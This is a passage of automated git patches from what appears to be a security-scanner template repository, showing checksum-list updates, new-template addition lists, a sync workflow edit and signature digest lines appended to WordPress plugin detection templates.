+http/technologies/wordpress/plugins/w3-total-cache.yaml:ad66a00a01da5e7b8cff52912b27f6bad0f3839c +http/technologies/wordpress/plugins/webp-converter-for-media.yaml:2c96756602c58b2d03c3a251b485f0fc290d4521 +http/technologies/wordpress/plugins/webp-express.yaml:3fdaee8be60980e572316df08fdc1bae378f1c6a +http/technologies/wordpress/plugins/widget-importer-exporter.yaml:0bf8d28a1008e3b9fd4e318adabd44506ddf3472 +http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:871c7b41aebc284ba9d5bc1607270888fb05b634 +http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:f8a89bab5553200004cd4ed2ff74f2f0ed6d3839 +http/technologies/wordpress/plugins/woo-variation-swatches.yaml:15b3a184c874db99255ba2551d4d925b71fba265 http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml:4f2c82ad5cf98659804bd115d05bf9db8461e200 -http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:37d322ccffdd3846de43647ecdefc0310678f0ce -http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml:04a18829e5e28c5ffa8a1d75fcef72ca7ca67f58 -http/technologies/wordpress/plugins/woocommerce-payments.yaml:e69342528665a6f3096325f9cf798d63eddf00b1 -http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:2bf58f445a9a1fbd170ec6f525c270abf9a2f83c -http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:f31832eca1ad6654102f23af301f351a4fef8b67 -http/technologies/wordpress/plugins/woocommerce-services.yaml:f60ddcf655e23f3b7eb2774260a236d2926b9747 -http/technologies/wordpress/plugins/woocommerce.yaml:7942c6d93bab0ec829cda0912ee47db6d33a8616 -http/technologies/wordpress/plugins/wordfence.yaml:0089b3189c8ffce46af7d7f8ff1035c8edd8ca48 -http/technologies/wordpress/plugins/wordpress-importer.yaml:801b125fc53ddf6b96cbd3b1df87bb2907744098 -http/technologies/wordpress/plugins/wordpress-seo.yaml:eb5026c81a058c8e23fd4a658d31155191ec4758 +http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:d3230d977d47969a5dabaa59f5207bd47a4eba82 +http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml:961b2182decfa0e47bddb3a9435229fb28c9c7d3 +http/technologies/wordpress/plugins/woocommerce-payments.yaml:3e379163d373241c2e7a2ad497824f95689ee220 +http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:e8e143f83f92d8128f4dcc8cfae0d24e744ff11b +http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:8f2e7130b683e6c7db2d572d169d8b0d2959b8ee +http/technologies/wordpress/plugins/woocommerce-services.yaml:9f4168ea86b7c265e840ecc39c5cd91457b69bba +http/technologies/wordpress/plugins/woocommerce.yaml:ab02a75370fec98f312be65543b5571bb0495e40 +http/technologies/wordpress/plugins/wordfence.yaml:0462473344c345d9c4eb312705ebfcc5505cdcf5 +http/technologies/wordpress/plugins/wordpress-importer.yaml:205349dfc8dd684e8ab78d952a214f75af080074 +http/technologies/wordpress/plugins/wordpress-seo.yaml:0a74d6507bf2d8dbb696036a525130a48bdb1a68 http/technologies/wordpress/plugins/wordpress-woosidebars.yaml:679cd62c97446d90fc7fbb50f64403cb10c4c319 -http/technologies/wordpress/plugins/worker.yaml:65b582e4e00f2bf2ed0bb52ab2aa5fdb71fe6597 -http/technologies/wordpress/plugins/wp-fastest-cache.yaml:c90bcd3af3fa0fd98ebfbfde8a95362c4f739791 -http/technologies/wordpress/plugins/wp-file-manager.yaml:c781f4c1a21178dc589059e118505d5af7970ec5 -http/technologies/wordpress/plugins/wp-google-maps.yaml:1ba64792eb5565317bbdaf15cea334d528827533 -http/technologies/wordpress/plugins/wp-mail-smtp.yaml:f7e4257fd219d962f65fa95901844dc2e4ed4520 -http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:a6964e29cfb805ec40fd86ae63a57471791126b0 -http/technologies/wordpress/plugins/wp-migrate-db.yaml:b42ff142d3ed3e453bfa90c9b7063a2f04593a31 -http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:2cf6c3dabdae20b41086e76f818c928696b2065e -http/technologies/wordpress/plugins/wp-optimize.yaml:d8e49f27596eadd0b87023a358da901609dce662 -http/technologies/wordpress/plugins/wp-pagenavi.yaml:0c0837ee92e5f3673861bec53d03cdc6f27aa9b6 -http/technologies/wordpress/plugins/wp-reset.yaml:3ae2f0c45852203ba143244a199103eec6f98324 -http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:cbc4303e8120d75606d1a64211236fa07bb80267 -http/technologies/wordpress/plugins/wp-rollback.yaml:80f97177b615808591f6e3925b981e7c621a492c -http/technologies/wordpress/plugins/wp-seopress.yaml:ec0686a578ec2a6ba35e17e8ab8ab36e109bc977 -http/technologies/wordpress/plugins/wp-sitemap-page.yaml:0e0ef25523d5fabd71ba0bbcd313d64f693b44ff -http/technologies/wordpress/plugins/wp-smushit.yaml:d83af0f099eaaa90dd9de6d1b4f0b6383a11bf23 -http/technologies/wordpress/plugins/wp-statistics.yaml:a02012c13b64761d5b7ae0aa12422605a9e263c1 -http/technologies/wordpress/plugins/wp-super-cache.yaml:38468e88395a2899b4238c563ab72236df89df77 +http/technologies/wordpress/plugins/worker.yaml:8e8fc14abfc1380551a94ee7f122b912bcacb4bd +http/technologies/wordpress/plugins/wp-fastest-cache.yaml:ad1d73e97bbcc497867ff8d72002f8aebcf52ae2 +http/technologies/wordpress/plugins/wp-file-manager.yaml:ca4c546d57e540d639a66acd375eeb7d0b90fe5a +http/technologies/wordpress/plugins/wp-google-maps.yaml:c2c7c8477a9742575d40bdc508937798d5c9f6a3 +http/technologies/wordpress/plugins/wp-mail-smtp.yaml:6091e5b4597b0556c2705a55b964b1b0f8c1f369 +http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:15d672886d871a30b62b87539ab11136bba70bb0 +http/technologies/wordpress/plugins/wp-migrate-db.yaml:44a5b5c4175d7c71e76216915ef4d2b1275881b1 +http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:65e0cf9f44588209a789e704fd5d4070f6482962 +http/technologies/wordpress/plugins/wp-optimize.yaml:5e49fe0cc33e1186de691ecb2a3200205d01a211 +http/technologies/wordpress/plugins/wp-pagenavi.yaml:96b012cb4c09e81ee2bf7e679cf96b2dbb1066f8 +http/technologies/wordpress/plugins/wp-reset.yaml:412514499164783863b8b68430c7f197f8b6ae54 +http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:ba98eba18acb3e8959037689a48560a9ce31a9f1 +http/technologies/wordpress/plugins/wp-rollback.yaml:145d49708d027968e845531a36739f52eeb1ff3d +http/technologies/wordpress/plugins/wp-seopress.yaml:b7fcb27f3c6d85f16295a55a48ecd693b65a51ca +http/technologies/wordpress/plugins/wp-sitemap-page.yaml:44243c1cc0d8c94a0ca19b5baf1f6f6fb70900a5 +http/technologies/wordpress/plugins/wp-smushit.yaml:977dd38e8ed67dad650e1bb90aae4b7074ff3ce5 +http/technologies/wordpress/plugins/wp-statistics.yaml:d274d87bcb46e8464ef502d06f790cdb0bf920bd +http/technologies/wordpress/plugins/wp-super-cache.yaml:0b19548fad990c640012c855076270e0491c2a6f http/technologies/wordpress/plugins/wp-user-avatar.yaml:a8aa0e902ead01de33b23343603d18b63829517e -http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:af011cb4f4b4375f67df798132223751fc677645 -http/technologies/wordpress/plugins/wpcf7-redirect.yaml:ec7984e71fd0405d9cd03ae12e797ed1f9a0689b -http/technologies/wordpress/plugins/wpforms-lite.yaml:c60e5fca923e4bf24d8cb12174d4bb558007f0b9 -http/technologies/wordpress/plugins/wps-hide-login.yaml:c50453b091bb34854f9f3881771a880dfac3c254 -http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:3d5aa172de9d8c66dc944edb203b79b7db76f810 +http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:9f2183e36b5e1b85cd6849073307e5cad8d5b52d +http/technologies/wordpress/plugins/wpcf7-redirect.yaml:ba93d4ef4608a790cd9d3d847b68bf9b1e1dea50 +http/technologies/wordpress/plugins/wpforms-lite.yaml:936181dc67fd85927eb912b1022a8a7c24b4a848 +http/technologies/wordpress/plugins/wps-hide-login.yaml:54566fd541d82b11fb105253384e00a14bc1cc75 +http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:c89d7b1d8eff0f72ba3d4ad3b54683d9b08a81bb http/technologies/wordpress/plugins/yith-woocommerce-compare.yaml:caf39ccc6507df09c0816caa7af29404c193d9a5 -http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:b4e0bb08d114c5e17f2cb00b0b44e280c51a7c6c +http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:e3e323f44082c7c6610d1016c0062d40a6f6d788 http/technologies/wordpress/themes/wp-bricks-builder-theme.yaml:0b85e26615c692bab9ceb5ae74dc9adec4097b9e http/technologies/wordpress-detect.yaml:a0148caf9d3f957171e7b75d4382dc7d54e454e5 http/technologies/workerman-websocket-detect.yaml:1396bc8234c4f538d5f57966b6b8084fe68f574f @@ -8688,7 +8689,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:1bda7eb5ae79af72e209c8724ffa6fa63aa96bbc +templates-checksum.txt:46100b8f8a9e2e86c2f39643eef579fcdbd22e56 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 2bc4553c79680eb6a05821723f9c5d665c62bc52 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Fri, 21 Jun 2024 05:37:00 +0000 Subject: [PATCH 0478/1841] Auto Generated New Template Addition List [Fri Jun 21 05:37:00 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 3a3478e3a7..44bb6a280a 100644 --- a/.new-additions +++ b/.new-additions @@ -25,6 +25,7 @@ http/cves/2024/CVE-2024-2621.yaml http/cves/2024/CVE-2024-27718.yaml http/cves/2024/CVE-2024-28995.yaml http/cves/2024/CVE-2024-29824.yaml +http/cves/2024/CVE-2024-29895.yaml http/cves/2024/CVE-2024-29973.yaml http/cves/2024/CVE-2024-31750.yaml http/cves/2024/CVE-2024-31982.yaml From 6f232d63dd95a73c00e3e423c829559cb69134a3 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Fri, 21 Jun 2024 05:37:41 +0000 Subject: [PATCH 0479/1841] Auto Generated New Template Addition List [Fri Jun 21 05:37:41 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 44bb6a280a..ed29b13b27 100644 --- a/.new-additions +++ b/.new-additions @@ -35,6 +35,7 @@ http/cves/2024/CVE-2024-34982.yaml http/cves/2024/CVE-2024-3552.yaml http/cves/2024/CVE-2024-36837.yaml http/cves/2024/CVE-2024-37393.yaml +http/default-logins/mantisbt/mantisbt-anonymous-login.yaml http/exposed-panels/lorex-panel.yaml http/exposed-panels/oracle-application-server-panel.yaml http/exposed-panels/turnkey-lamp-panel.yaml From 31aab377d5c1e5516ea8712bed1468922e44b369 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Fri, 21 Jun 2024 05:37:47 +0000 Subject: [PATCH 0480/1841] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 1b4abea180..d21e8661be 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -30,6 +30,7 @@ on: - 'http/cves/2024/CVE-2024-27718.yaml' - 'http/cves/2024/CVE-2024-28995.yaml' - 'http/cves/2024/CVE-2024-29824.yaml' + - 'http/cves/2024/CVE-2024-29895.yaml' - 'http/cves/2024/CVE-2024-29973.yaml' - 'http/cves/2024/CVE-2024-31750.yaml' - 'http/cves/2024/CVE-2024-31982.yaml' From ff4ee17d181cf3756bdd9efaf7544229e7fd0705 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 21 Jun 2024 05:37:49 +0000 Subject: [PATCH 0481/1841] Auto Generated Templates Checksum [Fri Jun 21 05:37:49 UTC 2024] :robot: --- templates-checksum.txt | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 4208317349..c6ec9921a5 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3464,6 +3464,7 @@ http/default-logins/leostream/leostream-default-login.yaml:b478948b507e476bd490b http/default-logins/lucee/lucee-default-login.yaml:1f77fa884b48e3e147c00290ceedb09037d1ba49 http/default-logins/lutron/lutron-default-login.yaml:03cca82eae76164ef0f6576423f6a1499eb7a1a3 http/default-logins/magnolia-default-login.yaml:f1d27055c0c45da07e214e7cb2b677fe2808c919 +http/default-logins/mantisbt/mantisbt-anonymous-login.yaml:707fd8555ea2f6055073bd189c176f8b9ac1f0ac http/default-logins/mantisbt/mantisbt-default-credential.yaml:30f4e0ea9fb36172667235072e61ef734891ac9a http/default-logins/minio/minio-default-login.yaml:f832e9adbba186536407af73fbba5e55b73cf0d8 http/default-logins/mobotix/mobotix-default-login.yaml:e1ae410268e501412f31b614dc1f1194bb22f318 @@ -8689,7 +8690,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:46100b8f8a9e2e86c2f39643eef579fcdbd22e56 +templates-checksum.txt:0915c262bcf1b284663e2fe86f9e4f168cdb75e9 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 95a7f5da6d8b7f520e6f5897c4c9fb6c84249853 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Fri, 21 Jun 2024 05:38:25 +0000 Subject: [PATCH 0482/1841] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index d21e8661be..41e708cfa3 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -40,6 +40,7 @@ on: - 'http/cves/2024/CVE-2024-3552.yaml' - 'http/cves/2024/CVE-2024-36837.yaml' - 'http/cves/2024/CVE-2024-37393.yaml' + - 'http/default-logins/mantisbt/mantisbt-anonymous-login.yaml' - 'http/exposed-panels/lorex-panel.yaml' - 'http/exposed-panels/oracle-application-server-panel.yaml' - 'http/exposed-panels/turnkey-lamp-panel.yaml' From e6cca96495f986872ac66537c29545deefde5ed1 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 21 Jun 2024 05:38:34 +0000 Subject: [PATCH 0483/1841] Auto Template Signing [Fri Jun 21 05:38:34 UTC 2024] :robot: --- http/cves/2024/CVE-2024-29895.yaml | 1 + http/technologies/wordpress/plugins/ad-inserter.yaml | 1 + http/technologies/wordpress/plugins/add-to-any.yaml | 1 + http/technologies/wordpress/plugins/admin-menu-editor.yaml | 1 + http/technologies/wordpress/plugins/advanced-custom-fields.yaml | 1 + http/technologies/wordpress/plugins/akismet.yaml | 1 + http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml | 1 + http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml | 1 + .../wordpress/plugins/all-in-one-wp-security-and-firewall.yaml | 1 + http/technologies/wordpress/plugins/amp.yaml | 1 + http/technologies/wordpress/plugins/antispam-bee.yaml | 1 + http/technologies/wordpress/plugins/astra-sites.yaml | 1 + http/technologies/wordpress/plugins/autoptimize.yaml | 1 + http/technologies/wordpress/plugins/backwpup.yaml | 1 + http/technologies/wordpress/plugins/better-search-replace.yaml | 1 + http/technologies/wordpress/plugins/better-wp-security.yaml | 1 + .../wordpress/plugins/black-studio-tinymce-widget.yaml | 1 + http/technologies/wordpress/plugins/breadcrumb-navxt.yaml | 1 + http/technologies/wordpress/plugins/breeze.yaml | 1 + http/technologies/wordpress/plugins/broken-link-checker.yaml | 1 + .../technologies/wordpress/plugins/child-theme-configurator.yaml | 1 + http/technologies/wordpress/plugins/classic-editor.yaml | 1 + http/technologies/wordpress/plugins/classic-widgets.yaml | 1 + .../wordpress/plugins/click-to-chat-for-whatsapp.yaml | 1 + http/technologies/wordpress/plugins/cmb2.yaml | 1 + http/technologies/wordpress/plugins/coblocks.yaml | 1 + http/technologies/wordpress/plugins/code-snippets.yaml | 1 + http/technologies/wordpress/plugins/coming-soon.yaml | 1 + http/technologies/wordpress/plugins/complianz-gdpr.yaml | 1 + http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml | 1 + http/technologies/wordpress/plugins/contact-form-7.yaml | 1 + http/technologies/wordpress/plugins/contact-form-cfdb7.yaml | 1 + http/technologies/wordpress/plugins/cookie-law-info.yaml | 1 + http/technologies/wordpress/plugins/cookie-notice.yaml | 1 + http/technologies/wordpress/plugins/copy-delete-posts.yaml | 1 + http/technologies/wordpress/plugins/creame-whatsapp-me.yaml | 1 + .../wordpress/plugins/creative-mail-by-constant-contact.yaml | 1 + http/technologies/wordpress/plugins/custom-css-js.yaml | 1 + http/technologies/wordpress/plugins/custom-fonts.yaml | 1 + http/technologies/wordpress/plugins/custom-post-type-ui.yaml | 1 + http/technologies/wordpress/plugins/disable-comments.yaml | 1 + http/technologies/wordpress/plugins/disable-gutenberg.yaml | 1 + http/technologies/wordpress/plugins/duplicate-page.yaml | 1 + http/technologies/wordpress/plugins/duplicate-post.yaml | 1 + http/technologies/wordpress/plugins/duplicator.yaml | 1 + .../wordpress/plugins/duracelltomi-google-tag-manager.yaml | 1 + http/technologies/wordpress/plugins/easy-table-of-contents.yaml | 1 + http/technologies/wordpress/plugins/easy-wp-smtp.yaml | 1 + http/technologies/wordpress/plugins/elementor.yaml | 1 + http/technologies/wordpress/plugins/elementskit-lite.yaml | 1 + http/technologies/wordpress/plugins/enable-media-replace.yaml | 1 + http/technologies/wordpress/plugins/envato-elements.yaml | 1 + .../wordpress/plugins/essential-addons-for-elementor-lite.yaml | 1 + http/technologies/wordpress/plugins/ewww-image-optimizer.yaml | 1 + .../technologies/wordpress/plugins/facebook-for-woocommerce.yaml | 1 + http/technologies/wordpress/plugins/fast-indexing-api.yaml | 1 + .../wordpress/plugins/favicon-by-realfavicongenerator.yaml | 1 + http/technologies/wordpress/plugins/flamingo.yaml | 1 + http/technologies/wordpress/plugins/fluentform.yaml | 1 + http/technologies/wordpress/plugins/font-awesome.yaml | 1 + .../wordpress/plugins/force-regenerate-thumbnails.yaml | 1 + http/technologies/wordpress/plugins/formidable.yaml | 1 + http/technologies/wordpress/plugins/forminator.yaml | 1 + http/technologies/wordpress/plugins/ga-google-analytics.yaml | 1 + http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml | 1 + .../wordpress/plugins/google-analytics-dashboard-for-wp.yaml | 1 + .../wordpress/plugins/google-analytics-for-wordpress.yaml | 1 + http/technologies/wordpress/plugins/google-listings-and-ads.yaml | 1 + http/technologies/wordpress/plugins/google-site-kit.yaml | 1 + .../technologies/wordpress/plugins/google-sitemap-generator.yaml | 1 + http/technologies/wordpress/plugins/gtranslate.yaml | 1 + http/technologies/wordpress/plugins/gutenberg.yaml | 1 + http/technologies/wordpress/plugins/happy-elementor-addons.yaml | 1 + .../wordpress/plugins/header-footer-code-manager.yaml | 1 + http/technologies/wordpress/plugins/header-footer-elementor.yaml | 1 + http/technologies/wordpress/plugins/header-footer.yaml | 1 + http/technologies/wordpress/plugins/health-check.yaml | 1 + http/technologies/wordpress/plugins/hello-dolly.yaml | 1 + http/technologies/wordpress/plugins/host-webfonts-local.yaml | 1 + http/technologies/wordpress/plugins/hostinger.yaml | 1 + http/technologies/wordpress/plugins/image-optimization.yaml | 1 + http/technologies/wordpress/plugins/imagify.yaml | 1 + http/technologies/wordpress/plugins/imsanity.yaml | 1 + .../wordpress/plugins/insert-headers-and-footers.yaml | 1 + http/technologies/wordpress/plugins/instagram-feed.yaml | 1 + .../wordpress/plugins/intuitive-custom-post-order.yaml | 1 + http/technologies/wordpress/plugins/iwp-client.yaml | 1 + http/technologies/wordpress/plugins/jetpack-boost.yaml | 1 + http/technologies/wordpress/plugins/jetpack.yaml | 1 + http/technologies/wordpress/plugins/kadence-blocks.yaml | 1 + http/technologies/wordpress/plugins/kirki.yaml | 1 + http/technologies/wordpress/plugins/leadin.yaml | 1 + .../wordpress/plugins/limit-login-attempts-reloaded.yaml | 1 + http/technologies/wordpress/plugins/limit-login-attempts.yaml | 1 + http/technologies/wordpress/plugins/litespeed-cache.yaml | 1 + http/technologies/wordpress/plugins/loco-translate.yaml | 1 + http/technologies/wordpress/plugins/loginizer.yaml | 1 + .../wordpress/plugins/mailchimp-for-woocommerce.yaml | 1 + http/technologies/wordpress/plugins/mailchimp-for-wp.yaml | 1 + http/technologies/wordpress/plugins/mailpoet.yaml | 1 + http/technologies/wordpress/plugins/maintenance.yaml | 1 + http/technologies/wordpress/plugins/mainwp-child.yaml | 1 + http/technologies/wordpress/plugins/malcare-security.yaml | 1 + http/technologies/wordpress/plugins/megamenu.yaml | 1 + http/technologies/wordpress/plugins/members.yaml | 1 + http/technologies/wordpress/plugins/meta-box.yaml | 1 + http/technologies/wordpress/plugins/metform.yaml | 1 + http/technologies/wordpress/plugins/ml-slider.yaml | 1 + http/technologies/wordpress/plugins/newsletter.yaml | 1 + .../technologies/wordpress/plugins/nextend-facebook-connect.yaml | 1 + http/technologies/wordpress/plugins/nextgen-gallery.yaml | 1 + http/technologies/wordpress/plugins/ninja-forms.yaml | 1 + http/technologies/wordpress/plugins/ocean-extra.yaml | 1 + http/technologies/wordpress/plugins/official-facebook-pixel.yaml | 1 + http/technologies/wordpress/plugins/one-click-demo-import.yaml | 1 + http/technologies/wordpress/plugins/optinmonster.yaml | 1 + http/technologies/wordpress/plugins/otter-blocks.yaml | 1 + http/technologies/wordpress/plugins/password-protected.yaml | 1 + http/technologies/wordpress/plugins/pdf-embedder.yaml | 1 + .../wordpress/plugins/pinterest-for-woocommerce.yaml | 1 + http/technologies/wordpress/plugins/pixelyoursite.yaml | 1 + http/technologies/wordpress/plugins/polylang.yaml | 1 + http/technologies/wordpress/plugins/popup-maker.yaml | 1 + http/technologies/wordpress/plugins/post-smtp.yaml | 1 + http/technologies/wordpress/plugins/post-types-order.yaml | 1 + .../wordpress/plugins/premium-addons-for-elementor.yaml | 1 + http/technologies/wordpress/plugins/pretty-link.yaml | 1 + http/technologies/wordpress/plugins/really-simple-captcha.yaml | 1 + http/technologies/wordpress/plugins/really-simple-ssl.yaml | 1 + http/technologies/wordpress/plugins/redirection.yaml | 1 + http/technologies/wordpress/plugins/redux-framework.yaml | 1 + http/technologies/wordpress/plugins/regenerate-thumbnails.yaml | 1 + http/technologies/wordpress/plugins/royal-elementor-addons.yaml | 1 + http/technologies/wordpress/plugins/safe-svg.yaml | 1 + http/technologies/wordpress/plugins/seo-by-rank-math.yaml | 1 + http/technologies/wordpress/plugins/sg-cachepress.yaml | 1 + http/technologies/wordpress/plugins/sg-security.yaml | 1 + http/technologies/wordpress/plugins/shortcodes-ultimate.yaml | 1 + .../wordpress/plugins/shortpixel-image-optimiser.yaml | 1 + .../technologies/wordpress/plugins/simple-custom-post-order.yaml | 1 + http/technologies/wordpress/plugins/simple-history.yaml | 1 + http/technologies/wordpress/plugins/siteguard.yaml | 1 + http/technologies/wordpress/plugins/siteorigin-panels.yaml | 1 + http/technologies/wordpress/plugins/smart-slider-3.yaml | 1 + http/technologies/wordpress/plugins/so-widgets-bundle.yaml | 1 + .../wordpress/plugins/sticky-header-effects-for-elementor.yaml | 1 + .../wordpress/plugins/stops-core-theme-and-plugin-updates.yaml | 1 + http/technologies/wordpress/plugins/sucuri-scanner.yaml | 1 + http/technologies/wordpress/plugins/svg-support.yaml | 1 + http/technologies/wordpress/plugins/table-of-contents-plus.yaml | 1 + http/technologies/wordpress/plugins/tablepress.yaml | 1 + http/technologies/wordpress/plugins/taxonomy-terms-order.yaml | 1 + http/technologies/wordpress/plugins/templately.yaml | 1 + http/technologies/wordpress/plugins/the-events-calendar.yaml | 1 + http/technologies/wordpress/plugins/tinymce-advanced.yaml | 1 + .../wordpress/plugins/translatepress-multilingual.yaml | 1 + .../wordpress/plugins/ultimate-addons-for-gutenberg.yaml | 1 + http/technologies/wordpress/plugins/under-construction-page.yaml | 1 + http/technologies/wordpress/plugins/updraftplus.yaml | 1 + http/technologies/wordpress/plugins/user-role-editor.yaml | 1 + http/technologies/wordpress/plugins/w3-total-cache.yaml | 1 + .../technologies/wordpress/plugins/webp-converter-for-media.yaml | 1 + http/technologies/wordpress/plugins/webp-express.yaml | 1 + .../technologies/wordpress/plugins/widget-importer-exporter.yaml | 1 + .../wordpress/plugins/woo-cart-abandonment-recovery.yaml | 1 + .../wordpress/plugins/woo-checkout-field-editor-pro.yaml | 1 + http/technologies/wordpress/plugins/woo-variation-swatches.yaml | 1 + .../wordpress/plugins/woocommerce-gateway-stripe.yaml | 1 + .../wordpress/plugins/woocommerce-legacy-rest-api.yaml | 1 + http/technologies/wordpress/plugins/woocommerce-payments.yaml | 1 + .../wordpress/plugins/woocommerce-paypal-payments.yaml | 1 + .../plugins/woocommerce-pdf-invoices-packing-slips.yaml | 1 + http/technologies/wordpress/plugins/woocommerce-services.yaml | 1 + http/technologies/wordpress/plugins/woocommerce.yaml | 1 + http/technologies/wordpress/plugins/wordfence.yaml | 1 + http/technologies/wordpress/plugins/wordpress-importer.yaml | 1 + http/technologies/wordpress/plugins/wordpress-seo.yaml | 1 + http/technologies/wordpress/plugins/worker.yaml | 1 + http/technologies/wordpress/plugins/wp-fastest-cache.yaml | 1 + http/technologies/wordpress/plugins/wp-file-manager.yaml | 1 + http/technologies/wordpress/plugins/wp-google-maps.yaml | 1 + http/technologies/wordpress/plugins/wp-mail-smtp.yaml | 1 + http/technologies/wordpress/plugins/wp-maintenance-mode.yaml | 1 + http/technologies/wordpress/plugins/wp-migrate-db.yaml | 1 + http/technologies/wordpress/plugins/wp-multibyte-patch.yaml | 1 + http/technologies/wordpress/plugins/wp-optimize.yaml | 1 + http/technologies/wordpress/plugins/wp-pagenavi.yaml | 1 + http/technologies/wordpress/plugins/wp-reset.yaml | 1 + .../wordpress/plugins/wp-reviews-plugin-for-google.yaml | 1 + http/technologies/wordpress/plugins/wp-rollback.yaml | 1 + http/technologies/wordpress/plugins/wp-seopress.yaml | 1 + http/technologies/wordpress/plugins/wp-sitemap-page.yaml | 1 + http/technologies/wordpress/plugins/wp-smushit.yaml | 1 + http/technologies/wordpress/plugins/wp-statistics.yaml | 1 + http/technologies/wordpress/plugins/wp-super-cache.yaml | 1 + http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml | 1 + http/technologies/wordpress/plugins/wpcf7-redirect.yaml | 1 + http/technologies/wordpress/plugins/wpforms-lite.yaml | 1 + http/technologies/wordpress/plugins/wps-hide-login.yaml | 1 + http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml | 1 + .../wordpress/plugins/yith-woocommerce-wishlist.yaml | 1 + 201 files changed, 201 insertions(+) diff --git a/http/cves/2024/CVE-2024-29895.yaml b/http/cves/2024/CVE-2024-29895.yaml index 0a3c4f53fe..0b4ef860c3 100644 --- a/http/cves/2024/CVE-2024-29895.yaml +++ b/http/cves/2024/CVE-2024-29895.yaml @@ -47,3 +47,4 @@ http: - type: status status: - 200 +# digest: 4a0a00473045022036ca4f58d85a591e3fe884da59281548e9500972732050dd3c92e899ce68a962022100d81c2817da1936d80d54210d249046aa944f89ae9058d6df14a86cedf00535b1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ad-inserter.yaml b/http/technologies/wordpress/plugins/ad-inserter.yaml index 7cbd1855ae..dae7c3402e 100644 --- a/http/technologies/wordpress/plugins/ad-inserter.yaml +++ b/http/technologies/wordpress/plugins/ad-inserter.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100fab095418e33039b29c51a8920a1fe18e6d0e7408e243a815952c1ea5733e8b1022100ab043f76f1c92624a7737398435a2795d0dc798d57f96594caf081dc66b99fc7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/add-to-any.yaml b/http/technologies/wordpress/plugins/add-to-any.yaml index 8d579ff23d..a45446e8de 100644 --- a/http/technologies/wordpress/plugins/add-to-any.yaml +++ b/http/technologies/wordpress/plugins/add-to-any.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 